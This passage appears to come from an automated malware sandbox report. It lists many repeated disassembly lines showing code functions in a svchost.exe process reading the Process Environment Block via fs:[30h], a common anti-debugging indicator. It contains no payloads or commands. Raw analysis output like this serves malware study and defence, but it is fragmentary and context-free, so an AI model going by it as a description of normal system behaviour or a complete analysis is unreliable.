                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h] 1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] 1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h] 1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h] 1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h] 1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h] 1_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h] 1_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h] 1_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] 1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] 1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h] 1_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h] 1_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h] 1_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h] 1_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h] 1_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h] 1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h] 1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
